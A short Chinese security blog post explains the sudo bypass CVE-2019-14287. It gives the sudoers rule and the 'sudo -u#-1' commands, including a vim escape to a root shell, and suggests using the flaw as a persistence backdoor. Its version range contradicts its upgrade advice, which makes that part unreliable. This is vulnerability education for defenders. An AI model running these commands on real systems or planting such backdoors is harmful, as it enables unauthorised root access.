注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。

[TOC]

CVE-2019-14287 | sudo bug

描述:研究人员在Linux SUDO命令中发现了一个bug,非授权的用户可以利用该bug以root权限运行命令。所以可以利用此漏洞来进行低权限用户的权限提升,亦可以用来进行持续维权;幸好该漏洞不是以标准配置下运行,因此大多数Linux服务器不受影响(所以我才说作后门最合适)。
影响版本: x <= v1.8.28
漏洞利用:在Linux操作系统下执行命令时,非特权的用户可以用sudo命令来以root权限来运行命令,前提是要知道root用户密码或提前被授予权限。
漏洞原理:通过在sudo命令中将UID 设为-1或4294967295来以root权限运行sudo命令,实际这时的Id=0又因为Linux上root的默认uid就是0所以得到root权限

漏洞复现:
1.可以通过在/etc/sudoers配置文件中加入特殊命令来配置Sudo命令为允许用户以其他用户运行命令

#比如下面的命令就可以让用户test以其他非root用户来运行/usr/bin/vim和 /usr/bin/id命令。
test ALL = (ALL, !root) /usr/bin/vim
test ALL = (ALL, !root) /usr/bin/id

#比如,下面的命令就用test用户的UID来替代用户名了:
sudo -u#1002 vim

#用sudo -u来指定要运行的用户
比如,下面的命令就利用该漏洞来以root权限启动 /usr/bin/id ,但是test用户的 /etc/sudoers文件中是没有这样的权限的。
sudo -u#-1 id

#实际利用
sudo -u#-1 vim
:!/bin/bash #进入Shell界面

WeiyiGeek.

漏洞修复:建议用户尽快升级到1.8.28版本